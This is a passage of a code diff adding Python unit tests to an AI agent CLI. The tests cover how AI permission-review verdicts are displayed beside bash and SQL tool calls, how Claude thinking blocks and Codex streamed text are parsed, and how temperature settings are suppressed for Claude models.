+        assert "+5 lines" in text

--- a/tests/unit_tests/cli/action_display/test_renderers.py
+++ b/tests/unit_tests/cli/action_display/test_renderers.py
@@ -1421,3 +1421,166 @@ class TestPermissionReviewRow:
         # Three output rows plus the folded remainder, unchanged by the review row.
         assert "l0" in text and "l2" in text
         assert "+5 lines" in text
+
+
+class TestSubagentPermissionReviewRow:
+    """A reviewed sub-agent tool call shows the same verdict as a main-agent one.
+
+    Regression: the row was only wired into ``_render_main_tool``, so a
+    subagent could run a gated bash/SQL action and display just its result —
+    the reader could not tell a review had happened or what it concluded.
+    """
+
+    @staticmethod
+    def _bash_action(review):
+        now = datetime.now()
+        return _make_action(
+            ActionRole.TOOL,
+            ActionStatus.SUCCESS,
+            depth=1,
+            action_type="bash",
+            messages="bash",
+            input_data={"function_name": "bash", "arguments": {"command": "npm ci"}},
+            output_data={
+                "raw_output": json.dumps({"success": 1, "result": "added 42 packages"}),
+                "permission_review": review,
+            },
+            start_time=now,
+            end_time=now + timedelta(seconds=2.3),
+        )
+
+    @staticmethod
+    def _sql_action(review):
+        now = datetime.now()
+        return _make_action(
+            ActionRole.TOOL,
+            ActionStatus.SUCCESS,
+            depth=1,
+            action_type="execute_sql",
+            messages="execute_sql",
+            input_data={"function_name": "execute_sql", "arguments": {"sql": "DELETE FROM staging WHERE id = 1"}},
+            output_data={"success": 1, "result": "1 row affected", "permission_review": review},
+            start_time=now,
+            end_time=now + timedelta(seconds=0.4),
+        )
+
+    def test_compact_bash_shows_the_verdict(self):
+        action = self._bash_action(
+            {"decision": "allow", "risk_level": "low", "confidence": 0.92, "rationale": "reinstalls declared deps"}
+        )
+        text = _plain(_renderer().render_subagent_action(action, verbose=False))
+
+        assert "AI review ✓ passed" in text
+        assert "reinstalls declared deps" in text
+
+    def test_compact_bash_puts_the_verdict_above_the_result(self):
+        action = self._bash_action({"decision": "allow", "rationale": "reversible"})
+        text = _plain(_renderer().render_subagent_action(action, verbose=False))
+
+        assert text.index("AI review") < text.index("added 42 packages")
+
+    def test_compact_sql_shows_the_verdict(self):
+        action = self._sql_action({"decision": "ask", "risk_level": "medium", "rationale": "predicate-bounded delete"})
+        text = _plain(_renderer().render_subagent_action(action, verbose=False))
+
+        assert "AI review ✗ flagged" in text
+        assert "predicate-bounded delete" in text
+
+    def test_verbose_bash_shows_the_untruncated_rationale(self):
+        rationale = "z" * 300
+        action = self._bash_action({"decision": "allow", "risk_level": "low", "rationale": rationale})
+        text = _plain(_renderer().render_subagent_action(action, verbose=True))
+
+        assert rationale in text.replace("\n", "")
+
+    def test_verbose_sql_shows_the_verdict(self):
+        action = self._sql_action({"decision": "allow", "risk_level": "low", "rationale": "bounded"})
+        text = _plain(_renderer().render_subagent_action(action, verbose=True))
+
+        assert "AI review ✓ passed" in text
+
+    def test_unreviewed_subagent_call_renders_no_review_row(self):
+        now = datetime.now()
+        action = _make_action(
+            ActionRole.TOOL,
+            ActionStatus.SUCCESS,
+            depth=1,
+            action_type="bash",
+            messages="bash",
+            input_data={"function_name": "bash", "arguments": {"command": "npm ci"}},
+            output_data={"raw_output": json.dumps({"success": 1, "result": "ok"})},
+            start_time=now,
+            end_time=now + timedelta(seconds=0.1),
+        )
+        assert "AI review" not in _plain(_renderer().render_subagent_action(action, verbose=False))
+
+
+class TestManualExecPermissionReviewRow:
+    """The manually run bash>/sql> block shows what authorised the command.
+
+    Regression: ``bash_mode`` stamped the verdict onto the action's output and
+    the renderer read only ``output["payload"]``, dropping it.
+    """
+
+    @staticmethod
+    def _action(review):
+        payload = {
+            "kind": "bash",
+            "command": "npm ci",
+            "success": True,
+            "output": "added 42 packages",
+            "meta": "exit 0 in 2.30s",
+        }
+        output_data = {"payload": payload}
+        if review is not None:
+            output_data["permission_review"] = review
+        return _make_action(
+            ActionRole.TOOL,
+            ActionStatus.SUCCESS,
+            action_type="manual_exec",
+            messages="bash> npm ci",
+            input_data={"kind": "bash", "command": "npm ci"},
+            output_data=output_data,
+        )
+
+    def test_block_shows_the_verdict(self):
+        action = self._action(
+            {"decision": "allow", "risk_level": "low", "confidence": 0.92, "rationale": "reinstalls declared deps"}
+        )
+        text = _plain(_renderer().render_main_action(action, verbose=False))
+
+        assert "AI review ✓ passed" in text
+        assert "reinstalls declared deps" in text
+        # Still the full execution block, not a bare review line.
+        assert "npm ci" in text and "added 42 packages" in text
+
+    def test_block_names_a_user_override(self):
+        action = self._action({"outcome": "user_approved", "decision": "ask", "risk_level": "high", "rationale": "rm"})
+        text = _plain(_renderer().render_main_action(action, verbose=False))
+
+        assert "AI review ✗ flagged" in text
+        assert "user approved" in text
+
+    def test_verbose_block_shows_the_untruncated_rationale(self):
+        rationale = "w" * 300
+        action = self._action({"decision": "allow", "risk_level": "low", "rationale": rationale})
+        text = _plain(_renderer().render_main_action(action, verbose=True))
+
+        assert rationale in text.replace("\n", "").replace(" ", "")
+
+    def test_unreviewed_block_is_unchanged(self):
+        text = _plain(_renderer().render_main_action(self._action(None), verbose=False))
+
+        assert "AI review" not in text
+        assert "added 42 packages" in text
+
+    def test_payloadless_action_renders_nothing(self):
+        action = _make_action(
+            ActionRole.TOOL,
+            ActionStatus.FAILED,
+            action_type="manual_exec",
+            messages="bash> npm ci",
+            input_data={"kind": "bash", "command": "npm ci"},
+            output_data={"payload": None, "permission_review": {"decision": "ask", "rationale": "denied"}},
+        )
+        assert _renderer().render_main_action(action, verbose=False) == []

--- a/tests/unit_tests/cli/action_display/test_tool_content.py
+++ b/tests/unit_tests/cli/action_display/test_tool_content.py
@@ -67,6 +67,7 @@ from datus.cli.action_display.tool_content import (
     extract_args,
     format_generic_preview,
     format_output_verbose,
+    format_review_line,
     make_base_content,
     parse_output_data,
 )
@@ -2281,3 +2282,105 @@ class TestBuilderPostProcessing:
         )
         tc = builder.build(action, verbose=False)
         assert "bad thing" in tc.compact_result
+
+
+@pytest.mark.ci
+class TestReviewLine:
+    """One-line AI permission-review summary drawn above the result row."""
+
+    @staticmethod
+    def _review(**overrides):
+        payload = {
+            "outcome": "auto_allowed",
+            "decision": "allow",
+            "risk_level": "low",
+            "user_authorization": "medium",
+            "confidence": 0.92,
+            "rationale": "dependency install, scoped to the workspace, reversible",
+        }
+        payload.update(overrides)
+        return payload
+
+    def test_passed_verdict(self):
+        line = format_review_line(self._review())
+        assert line == (
+            "AI review ✓ passed · low risk · conf 0.92 · dependency install, scoped to the workspace, reversible"
+        )
+
+    def test_flagged_verdict_names_the_human_override(self):
+        """An approved-despite-flagged run must not read as a clean pass."""
+        line = format_review_line(self._review(decision="ask", risk_level="high", outcome="user_approved"))
+        assert "✗ flagged" in line
+        assert "high risk" in line
+        assert "user approved" in line
+
+    def test_auto_allowed_does_not_claim_a_human_approved(self):
+        assert "user approved" not in format_review_line(self._review())
+
+    def test_unavailable_verdict_says_so_once(self):
+        line = format_review_line({"outcome": "user_approved", "decision": "unavailable"})
+        assert line == "AI review ? unavailable · user approved"
+
+    def test_long_rationale_truncated_in_compact_but_not_verbose(self):
+        rationale = "x" * 400
+        compact = format_review_line(self._review(rationale=rationale))
+        verbose = format_review_line(self._review(rationale=rationale), verbose=True)
+        assert "..." in compact and len(compact) < 200
+        assert rationale in verbose
+
+    def test_multiline_rationale_collapses_to_one_line(self):
+        line = format_review_line(self._review(rationale="first\nsecond   third"))
+        assert "\n" not in line
+        assert "first second third" in line
+
+    @pytest.mark.parametrize("review", [None, {}, "not a dict", 42])
+    def test_missing_or_malformed_review_yields_empty(self, review):
+        assert format_review_line(review) == ""
+
+    def test_partial_payload_omits_absent_fields(self):
+        """A verdict without risk/confidence still renders a usable line."""
+        line = format_review_line({"outcome": "auto_allowed", "decision": "allow", "rationale": "fine"})
+        assert line == "AI review ✓ passed · fine"
+
+
+@pytest.mark.ci
+class TestBuilderReviewLine:
+    def test_reviewed_action_populates_review_line(self):
+        builder = ToolCallContentBuilder()
+        action = _make(
+            input_data={"function_name": "bash", "arguments": {"command": "npm ci"}},
+            output_data={
+                "success": True,
+                "permission_review": {"decision": "allow", "risk_level": "low", "rationale": "safe"},
+            },
+        )
+        assert "AI review ✓ passed" in builder.build(action, verbose=False).review_line
+
+    def test_unreviewed_action_leaves_review_line_empty(self):
+        builder = ToolCallContentBuilder()
+        action = _make(
+            input_data={"function_name": "bash", "arguments": {"command": "npm ci"}},
+            output_data={"success": True},
+        )
+        assert builder.build(action, verbose=False).review_line == ""
+
+    def test_review_line_does_not_disturb_the_result_rows(self):
+        """The review row is a separate field, so bash's line/overflow accounting
+        for its own output is unaffected."""
+        builder = ToolCallContentBuilder()
+        raw = json.dumps({"success": 1, "result": "\n".join(f"line {i}" for i in range(10))})
+        args = {"function_name": "bash", "arguments": {"command": "ls"}}
+        plain = builder.build(_make(input_data=args, output_data={"raw_output": raw}), verbose=False)
+        reviewed = builder.build(
+            _make(
+                input_data=args,
+                output_data={
+                    "raw_output": raw,
+                    "permission_review": {"decision": "allow", "rationale": "safe"},
+                },
+            ),
+            verbose=False,
+        )
+        assert plain.compact_result_overflow == 7
+        assert reviewed.compact_result_lines == plain.compact_result_lines
+        assert reviewed.compact_result_overflow == plain.compact_result_overflow

--- a/tests/unit_tests/cli/action_display/test_tool_content.py
+++ b/tests/unit_tests/cli/action_display/test_tool_content.py
@@ -2328,6 +2328,38 @@ class TestReviewLine:
         assert "..." in compact and len(compact) < 200
         assert rationale in verbose
 
+    def test_rationale_within_the_prompted_budget_is_not_truncated(self):
+        """The display budget must not be tighter than what the reviewer is
+        asked for, or every compliant verdict would still show "..."."""
+        from datus.cli.action_display.tool_content import _REVIEW_RATIONALE_MAX
+
+        rationale = "deletes build/ in the workspace, artifacts regenerable"
+        assert len(rationale) <= _REVIEW_RATIONALE_MAX
+        assert rationale in format_review_line(self._review(rationale=rationale))
+
+    def test_common_row_fits_a_120_column_terminal(self):
+        """Budget rationale: the row the user sees most must not wrap.
+
+        The overwhelming majority of rendered reviews are auto-allowed
+        low/medium verdicts, so that shape is the one held to 120 columns
+        (the renderer prepends a 5-column gutter). A flagged/critical verdict,
+        or one carrying "user approved", is longer and may wrap — those are the
+        rare, high-attention rows where wrapping costs little.
+        """
+        from datus.cli.action_display.tool_content import _REVIEW_RATIONALE_MAX
+
+        common_prefix = format_review_line(
+            {"decision": "allow", "risk_level": "low", "confidence": 0.97, "rationale": ""}
+        )
+        assert 5 + len(common_prefix) + len(" \u00b7 ") + _REVIEW_RATIONALE_MAX <= 120
+
+    def test_display_budget_matches_what_the_prompt_asks_for(self):
+        """Guard against the two drifting apart on a later edit."""
+        from datus.cli.action_display.tool_content import _REVIEW_RATIONALE_MAX
+        from datus.tools.permission.auto_reviewer import _REVIEW_SYSTEM_PROMPT
+
+        assert f"about {_REVIEW_RATIONALE_MAX} characters" in _REVIEW_SYSTEM_PROMPT
+
     def test_multiline_rationale_collapses_to_one_line(self):
         line = format_review_line(self._review(rationale="first\nsecond   third"))
         assert "\n" not in line

--- a/tests/unit_tests/cli/test_manual_exec.py
+++ b/tests/unit_tests/cli/test_manual_exec.py
@@ -38,9 +38,9 @@ from datus.cli.manual_exec import (
 )
 
 
-def _render_text(payload) -> str:
+def _render_text(payload, **kwargs) -> str:
     console = Console(file=io.StringIO(), width=200, no_color=True)
-    console.print(render_exec_block(payload))
+    console.print(render_exec_block(payload, **kwargs))
     return console.file.getvalue()
 
 
@@ -292,6 +292,27 @@ class TestRenderExecBlock:
         payload = build_bash_payload("echo", True, "value=[red]not-a-tag[/red]", None, 0.01)
         text = _render_text(payload)
         assert "[red]not-a-tag[/red]" in text
+
+    def test_review_line_renders_under_the_command(self):
+        """A reviewed manual execution shows what authorised it."""
+        payload = build_bash_payload("npm ci", True, "added 42 packages", None, 2.3)
+        text = _render_text(payload, review_line="AI review ✓ passed · low risk · reinstalls declared deps")
+
+        assert "AI review ✓ passed" in text
+        assert "reinstalls declared deps" in text
+        assert text.index("npm ci") < text.index("AI review") < text.index("added 42 packages")
+
+    def test_no_review_line_leaves_the_block_unchanged(self):
+        payload = build_bash_payload("npm ci", True, "added 42 packages", None, 2.3)
+
+        assert _render_text(payload, review_line="") == _render_text(payload)
+
+    def test_review_line_markup_is_not_interpreted(self):
+        """The rationale is model-authored text, so ``[...]`` stays literal."""
+        payload = build_bash_payload("ls", True, "", None, 0.01)
+        text = _render_text(payload, review_line="AI review ✓ passed · reads [red]local[/red] files")
+
+        assert "[red]local[/red]" in text
 
     def test_block_is_framed_like_user_message_in_mode_colour(self):
         """Top/bottom rules (HORIZONTALS) like a user message, coloured per mode."""

--- a/tests/unit_tests/models/test_claude_model.py
+++ b/tests/unit_tests/models/test_claude_model.py
@@ -28,6 +28,36 @@ from datus.models.claude_model import (
 # ---------------------------------------------------------------------------
 
 
+def _content_block(block_type: str, **attrs):
+    """A native Anthropic content block.
+
+    Every real block carries ``type``; a bare ``MagicMock`` does not, and that
+    looseness is what let ``content[0].text`` ship — the fixture answered to
+    any attribute the parser reached for.
+    """
+    block = MagicMock()
+    block.type = block_type
+    for name, value in attrs.items():
+        setattr(block, name, value)
+    return block
+
+
+def _text_block(text: str):
+    return _content_block("text", text=text)
+
+
+def _thinking_block(thinking: str = "considering the request"):
+    """A thinking block, which has ``.thinking`` and no ``.text``.
+
+    ``interleaved-thinking-2025-05-14`` rides in ``OAUTH_BETA_HEADERS``, so a
+    thinking-capable model on the native path leads with one of these.
+    """
+    block = MagicMock(spec=["type", "thinking"])
+    block.type = "thinking"
+    block.thinking = thinking
+    return block
+
+
 def _make_model_config(
     model="claude-sonnet-4-5",
     api_key="sk-ant-test",
@@ -370,10 +400,8 @@ class TestClaudeModelGenerate:
         cfg = _make_model_config(use_native_api=True)
         model = _make_claude_model(cfg)
 
-        content_block = MagicMock()
-        content_block.text = "native response"
         mock_response = MagicMock()
-        mock_response.content = [content_block]
+        mock_response.content = [_text_block("native response")]
         mock_create = MagicMock(return_value=mock_response)
         model.anthropic_client.messages.create = mock_create
 
@@ -385,10 +413,8 @@ class TestClaudeModelGenerate:
         cfg = _make_model_config(use_native_api=True)
         model = _make_claude_model(cfg)
 
-        content_block = MagicMock()
-        content_block.text = "ok"
         mock_response = MagicMock()
-        mock_response.content = [content_block]
+        mock_response.content = [_text_block("ok")]
         mock_create = MagicMock(return_value=mock_response)
         model.anthropic_client.messages.create = mock_create
 
@@ -411,6 +437,72 @@ class TestClaudeModelGenerate:
 
         result = model.generate("hello")
         assert result == ""
+
+
+class TestNativeThinkingBlocks:
+    """A leading thinking block must not cost us the answer.
+
+    Regression: ``content[0].text`` raised ``'BetaThinkingBlock' object has no
+    attribute 'text'`` and the caller saw a failed request instead of the
+    complete text sitting in the next block. It surfaced as an AI permission
+    review reporting "unavailable", but it breaks every non-streaming native
+    call: OAuth subscription tokens force this path and the client carries
+    ``interleaved-thinking-2025-05-14``, so the server may think whether or not
+    the caller asked it to — ``generate`` never forwards ``enable_thinking``.
+    """
+
+    @staticmethod
+    def _generate(content, prompt="review this"):
+        cfg = _make_model_config(use_native_api=True)
+        model = _make_claude_model(cfg)
+        mock_response = MagicMock()
+        mock_response.content = content
+        model.anthropic_client.messages.create = MagicMock(return_value=mock_response)
+        return model.generate(prompt)
+
+    def test_thinking_block_before_text_still_returns_the_text(self):
+        assert self._generate([_thinking_block(), _text_block('{"decision": "allow"}')]) == '{"decision": "allow"}'
+
+    def test_thinking_only_response_returns_empty_not_an_error(self):
+        """No text to return, but a truncated think must not raise."""
+        assert self._generate([_thinking_block()]) == ""
+
+    def test_redacted_thinking_block_is_skipped(self):
+        redacted = MagicMock(spec=["type", "data"])
+        redacted.type = "redacted_thinking"
+        redacted.data = "encrypted"
+
+        assert self._generate([redacted, _text_block("answer")]) == "answer"
+
+    def test_tool_use_block_is_skipped(self):
+        tool_use = MagicMock(spec=["type", "id", "name", "input"])
+        tool_use.type = "tool_use"
+
+        assert self._generate([_text_block("answer"), tool_use]) == "answer"
+
+    def test_multiple_text_blocks_are_joined(self):
+        assert self._generate([_text_block("first"), _text_block("second")]) == "first\nsecond"
+
+    def test_empty_text_block_does_not_add_a_blank_line(self):
+        assert self._generate([_text_block(""), _text_block("only")]) == "only"
+
+    def test_none_content_returns_empty(self):
+        assert self._generate(None) == ""
+
+    def test_json_survives_the_reviewer_round_trip(self):
+        """The concrete failure: a verdict that never reached the reviewer."""
+        import json
+
+        verdict = {
+            "risk_level": "low",
+            "user_authorization": "high",
+            "decision": "allow",
+            "confidence": 0.97,
+            "rationale": "deletes a temp dir, regenerable",
+        }
+        raw = self._generate([_thinking_block(), _text_block(json.dumps(verdict))])
+
+        assert json.loads(raw) == verdict
 
 
 # ---------------------------------------------------------------------------

--- a/tests/unit_tests/models/test_codex_model.py
+++ b/tests/unit_tests/models/test_codex_model.py
@@ -1388,3 +1388,72 @@ class TestCodexCacheIdentity:
 
         ms = model._codex_model_settings("chat", _Session())
         assert ms.extra_headers["chatgpt-account-id"] == "acct-42"
+
+
+def _delta_event(text: str):
+    event = MagicMock()
+    event.type = "response.output_text.delta"
+    event.delta = text
+    return event
+
+
+def _completed_event(output_text):
+    event = MagicMock()
+    event.type = "response.completed"
+    event.response.output_text = output_text
+    return event
+
+
+class TestConsumeStreamText:
+    """The terminal event is preferred, but never trusted when it is empty.
+
+    Regression: a ChatGPT-account Codex endpoint streams the full answer over
+    ``response.output_text.delta`` and then reports ``output_text == ""`` on
+    ``response.completed``. Returning that empty value threw away the whole
+    response, which surfaced as a JSONDecodeError from
+    ``generate_with_json_output`` and made every structured call fail.
+    """
+
+    @staticmethod
+    def _consume(events):
+        from datus.models.codex_model import CodexModel
+
+        return CodexModel._consume_stream_text(events)
+
+    def test_empty_completed_falls_back_to_deltas(self):
+        events = [_delta_event('{"ok":'), _delta_event(" true}"), _completed_event("")]
+        assert self._consume(events) == '{"ok": true}'
+
+    def test_missing_output_text_falls_back_to_deltas(self):
+        events = [_delta_event("hello"), _completed_event(None)]
+        assert self._consume(events) == "hello"
+
+    def test_completed_text_wins_when_present(self):
+        """The terminal value stays authoritative — it may be normalized."""
+        events = [_delta_event("partial"), _completed_event("full answer")]
+        assert self._consume(events) == "full answer"
+
+    def test_empty_completed_with_no_deltas_returns_empty(self):
+        assert self._consume([_completed_event("")]) == ""
+
+    def test_stream_without_completed_event_joins_deltas(self):
+        assert self._consume([_delta_event("a"), _delta_event("b")]) == "ab"
+
+    def test_completed_without_response_falls_back_to_deltas(self):
+        event = MagicMock()
+        event.type = "response.completed"
+        event.response = None
+        assert self._consume([_delta_event("kept"), event]) == "kept"
+
+    def test_json_output_survives_an_empty_terminal_event(self, model_config, mock_oauth):
+        """End-to-end: the reviewer's structured call must not raise."""
+        import json
+
+        from datus.models.codex_model import CodexModel
+
+        payload = {"risk_level": "low", "decision": "allow"}
+        events = [_delta_event(json.dumps(payload)), _completed_event("")]
+        model = CodexModel(model_config=model_config)
+        with patch.object(model, "_refresh_client_token"), patch.object(model, "_get_client") as client:
+            client.return_value.responses.create.return_value = events
+            assert model.generate_with_json_output("judge this", output_schema={"type": "object"}) == payload

--- a/tests/unit_tests/models/test_openai_compatible.py
+++ b/tests/unit_tests/models/test_openai_compatible.py
@@ -2340,6 +2340,14 @@ class TestClaudeTemperatureSuppression:
     def test_other_providers_keep_an_explicit_value(self):
         assert self._generate_kwargs("deepseek", temperature=0.5)["temperature"] == 0.5
 
+    def test_anthropic_routed_provider_is_suppressed_too(self):
+        """``anthropic`` is the documented alias of ``claude`` in
+        :class:`LLMProvider`; a request routed under that spelling reaches the
+        same endpoint and must lose the same knob."""
+        kwargs = self._generate_kwargs("anthropic", _make_model_config(temperature=0.3))
+        assert "temperature" not in kwargs
+        assert "top_p" not in kwargs
+
     def test_claude_5_models_are_selectable_from_the_catalog(self):
         """The fix is unreachable through ``/model`` if the catalog omits them."""
         import yaml
@@ -2350,3 +2358,54 @@ class TestClaudeTemperatureSuppression:
         models = catalog["providers"]["claude"]["models"]
         assert "claude-sonnet-5" in models
         assert "claude-opus-5" in models
+
+
+class TestAgentSamplingParamSuppression:
+    """The Agents-SDK path drops the same knobs the completion path drops.
+
+    Regression: the suppression lived only in ``generate``, so a configured
+    ``temperature``/``top_p`` still reached Anthropic through ``ModelSettings``
+    on every tool call and streaming request — a claude-*-5 tool call 400ed on
+    a parameter the completion path had already learned to drop.
+    """
+
+    def _model_settings(self, provider, **config_kwargs):
+        model = _make_model(_make_model_config(**config_kwargs))
+        model.litellm_adapter.provider = provider
+        with patch("datus.models.openai_compatible.Agent") as MockAgent:
+            MockAgent.return_value = MagicMock()
+            model._build_agent(
+                instruction="test",
+                output_type=str,
+                strict_json_schema=True,
+                connected_servers={},
+                tools=None,
+            )
+        return MockAgent.call_args[1]["model_settings"]
+
+    def test_configured_temperature_is_suppressed_for_claude(self):
+        assert self._model_settings("claude", temperature=0.3).temperature is None
+
+    def test_configured_top_p_is_suppressed_for_claude(self):
+        assert self._model_settings("claude", top_p=0.8).top_p is None
+
+    def test_both_knobs_suppressed_together_for_claude(self):
+        settings = self._model_settings("claude", temperature=0.3, top_p=0.8)
+        assert settings.temperature is None
+        assert settings.top_p is None
+
+    def test_suppressed_for_anthropic_routed_provider(self):
+        settings = self._model_settings("anthropic", temperature=0.3, top_p=0.8)
+        assert settings.temperature is None
+        assert settings.top_p is None
+
+    @pytest.mark.parametrize("model_name", ["claude-sonnet-5", "claude-opus-5", "claude-sonnet-4-6"])
+    def test_suppressed_for_every_claude_model(self, model_name):
+        settings = self._model_settings("claude", model=model_name, temperature=0.3)
+        assert settings.temperature is None
+
+    def test_other_providers_keep_both_knobs(self):
+        """Suppression must not bleed into OpenAI/DeepSeek/Kimi/..."""
+        settings = self._model_settings("openai", temperature=0.3, top_p=0.8)
+        assert settings.temperature == 0.3
+        assert settings.top_p == 0.8

--- a/tests/unit_tests/models/test_openai_compatible.py
+++ b/tests/unit_tests/models/test_openai_compatible.py
@@ -2277,3 +2277,82 @@ class TestBuildRunConfigInputFilter:
         result = await rc.call_model_input_filter(data)
 
         assert result is data.model_data
+
+
+class TestSupportsTemperature:
+    """``model_specs.supports_temperature: false`` suppresses the parameter.
+
+    Regression: the claude-*-5 family rejects the request outright with
+    "`temperature` is deprecated for this model.", so the non-reasoning default
+    of 0.7 made those models unusable for EVERY call — plain generation and
+    structured output alike.
+    """
+
+    @staticmethod
+    def _mock_resp(content="ok"):
+        resp = MagicMock()
+        resp.choices = [MagicMock()]
+        resp.choices[0].message.content = content
+        resp.choices[0].message.reasoning_content = None
+        resp.choices[0].finish_reason = "stop"
+        resp.model = "m"
+        resp.usage = MagicMock()
+        resp.usage.prompt_tokens = 1
+        resp.usage.completion_tokens = 1
+        resp.usage.total_tokens = 2
+        return resp
+
+    def _generate_kwargs(self, model_name, specs, **gen_kwargs):
+        model = _make_model(_make_model_config(model=model_name))
+        with (
+            patch("datus.models.openai_compatible._load_model_specs", return_value=specs),
+            patch("datus.models.openai_compatible.litellm.completion", return_value=self._mock_resp()) as mock_lit,
+        ):
+            model.generate("prompt", **gen_kwargs)
+        return mock_lit.call_args[1]
+
+    _UNSUPPORTED = {"claude-sonnet-5": {"supports_temperature": False}}
+
+    def test_flag_false_suppresses_the_default(self):
+        assert "temperature" not in self._generate_kwargs("claude-sonnet-5", self._UNSUPPORTED)
+
+    def test_flag_false_suppresses_an_explicit_kwarg(self):
+        """No caller-supplied value can make the request valid, so kwargs lose."""
+        assert "temperature" not in self._generate_kwargs("claude-sonnet-5", self._UNSUPPORTED, temperature=0.5)
+
+    def test_flag_false_suppresses_model_config(self):
+        model = _make_model(_make_model_config(model="claude-sonnet-5", temperature=0.3))
+        with (
+            patch("datus.models.openai_compatible._load_model_specs", return_value=self._UNSUPPORTED),
+            patch("datus.models.openai_compatible.litellm.completion", return_value=self._mock_resp()) as mock_lit,
+        ):
+            model.generate("prompt")
+        assert "temperature" not in mock_lit.call_args[1]
+
+    def test_absent_flag_keeps_the_existing_default(self):
+        kwargs = self._generate_kwargs("claude-sonnet-4-6", {"claude-sonnet-4-6": {"max_tokens": 128000}})
+        assert kwargs["temperature"] == 0.7
+
+    def test_flag_true_keeps_temperature(self):
+        kwargs = self._generate_kwargs("some-model", {"some-model": {"supports_temperature": True}})
+        assert kwargs["temperature"] == 0.7
+
+    def test_flag_does_not_leak_across_model_families(self):
+        """Prefix matching must not let a 5-family entry disable 4.x."""
+        specs = {"claude-sonnet-5": {"supports_temperature": False}}
+        assert self._generate_kwargs("claude-sonnet-4-6", specs)["temperature"] == 0.7
+
+    def test_numeric_spec_is_not_read_as_a_capability_flag(self):
+        """``bool`` is an ``int`` subclass; the reverse must not hold."""
+        model = _make_model(_make_model_config(model="m"))
+        with patch("datus.models.openai_compatible._load_model_specs", return_value={"m": {"supports_temperature": 1}}):
+            assert model.supports_temperature() is True
+
+    def test_real_catalog_marks_the_claude_5_family(self):
+        """The shipped providers.yml must carry the verified entries."""
+        from datus.models.openai_compatible import _load_model_specs
+
+        specs = _load_model_specs()
+        assert specs["claude-sonnet-5"]["supports_temperature"] is False
+        assert specs["claude-opus-5"]["supports_temperature"] is False
+        assert "supports_temperature" not in specs["claude-sonnet-4-6"]

--- a/tests/unit_tests/models/test_openai_compatible.py
+++ b/tests/unit_tests/models/test_openai_compatible.py
@@ -396,9 +396,9 @@ class TestGenerate:
     # ------------------------------------------------------------------
 
     def test_top_p_suppressed_when_litellm_provider_is_claude_default_path(self):
-        """No kwargs, no model_config — the non-reasoning default would
-        normally set ``top_p=1.0``. Provider routing to Claude must
-        veto that and leave ``top_p`` absent from the payload."""
+        """No kwargs, no model_config — the non-reasoning defaults would
+        normally set ``top_p=1.0`` and ``temperature=0.7``. Provider routing to
+        Claude must veto both and leave them absent from the payload."""
         model = _make_model()
         model.litellm_adapter.provider = "claude"
         mock_resp = self._mock_litellm_response("ok")
@@ -406,8 +406,10 @@ class TestGenerate:
             model.generate("prompt")
         call_kwargs = mock_lit.call_args[1]
         assert "top_p" not in call_kwargs
-        # ``temperature`` is fine alone — Anthropic only complains when both are set.
-        assert call_kwargs.get("temperature") == 0.7
+        # ``temperature`` used to be sent alone (Anthropic only rejected the
+        # pair), but the claude-*-5 family rejects it outright, so neither
+        # sampling knob goes to Anthropic any more.
+        assert "temperature" not in call_kwargs
 
     def test_top_p_suppressed_when_provider_is_claude_kwargs_value(self):
         """An explicit non-None ``top_p`` in kwargs still loses to the
@@ -2279,13 +2281,15 @@ class TestBuildRunConfigInputFilter:
         assert result is data.model_data
 
 
-class TestSupportsTemperature:
-    """``model_specs.supports_temperature: false`` suppresses the parameter.
+class TestClaudeTemperatureSuppression:
+    """``temperature`` is never sent to Anthropic, for the whole Claude family.
 
     Regression: the claude-*-5 family rejects the request outright with
     "`temperature` is deprecated for this model.", so the non-reasoning default
     of 0.7 made those models unusable for EVERY call — plain generation and
-    structured output alike.
+    structured output alike. The gate is the routed provider rather than a
+    per-model flag so a newly released Claude model works on day one instead of
+    400ing until the catalog catches up.
     """
 
     @staticmethod
@@ -2302,57 +2306,47 @@ class TestSupportsTemperature:
         resp.usage.total_tokens = 2
         return resp
 
-    def _generate_kwargs(self, model_name, specs, **gen_kwargs):
-        model = _make_model(_make_model_config(model=model_name))
-        with (
-            patch("datus.models.openai_compatible._load_model_specs", return_value=specs),
-            patch("datus.models.openai_compatible.litellm.completion", return_value=self._mock_resp()) as mock_lit,
-        ):
+    def _generate_kwargs(self, provider, model_config=None, **gen_kwargs):
+        model = _make_model(model_config)
+        model.litellm_adapter.provider = provider
+        with patch("datus.models.openai_compatible.litellm.completion", return_value=self._mock_resp()) as mock_lit:
             model.generate("prompt", **gen_kwargs)
         return mock_lit.call_args[1]
 
-    _UNSUPPORTED = {"claude-sonnet-5": {"supports_temperature": False}}
+    def test_default_is_suppressed_for_claude(self):
+        assert "temperature" not in self._generate_kwargs("claude")
 
-    def test_flag_false_suppresses_the_default(self):
-        assert "temperature" not in self._generate_kwargs("claude-sonnet-5", self._UNSUPPORTED)
-
-    def test_flag_false_suppresses_an_explicit_kwarg(self):
+    def test_explicit_kwarg_is_suppressed_for_claude(self):
         """No caller-supplied value can make the request valid, so kwargs lose."""
-        assert "temperature" not in self._generate_kwargs("claude-sonnet-5", self._UNSUPPORTED, temperature=0.5)
+        assert "temperature" not in self._generate_kwargs("claude", temperature=0.5)
 
-    def test_flag_false_suppresses_model_config(self):
-        model = _make_model(_make_model_config(model="claude-sonnet-5", temperature=0.3))
-        with (
-            patch("datus.models.openai_compatible._load_model_specs", return_value=self._UNSUPPORTED),
-            patch("datus.models.openai_compatible.litellm.completion", return_value=self._mock_resp()) as mock_lit,
-        ):
-            model.generate("prompt")
-        assert "temperature" not in mock_lit.call_args[1]
+    def test_model_config_value_is_suppressed_for_claude(self):
+        kwargs = self._generate_kwargs("claude", _make_model_config(temperature=0.3))
+        assert "temperature" not in kwargs
 
-    def test_absent_flag_keeps_the_existing_default(self):
-        kwargs = self._generate_kwargs("claude-sonnet-4-6", {"claude-sonnet-4-6": {"max_tokens": 128000}})
-        assert kwargs["temperature"] == 0.7
+    @pytest.mark.parametrize(
+        "model_name", ["claude-sonnet-5", "claude-opus-5", "claude-sonnet-4-6", "claude-3-7-sonnet"]
+    )
+    def test_suppressed_for_every_claude_model(self, model_name):
+        """4.x rejects temperature alongside top_p, 5.x rejects it outright —
+        the whole family is treated the same."""
+        kwargs = self._generate_kwargs("claude", _make_model_config(model=model_name))
+        assert "temperature" not in kwargs
 
-    def test_flag_true_keeps_temperature(self):
-        kwargs = self._generate_kwargs("some-model", {"some-model": {"supports_temperature": True}})
-        assert kwargs["temperature"] == 0.7
+    def test_other_providers_keep_the_default(self):
+        """Suppression must not bleed into OpenAI/DeepSeek/Kimi/..."""
+        assert self._generate_kwargs("openai")["temperature"] == 0.7
 
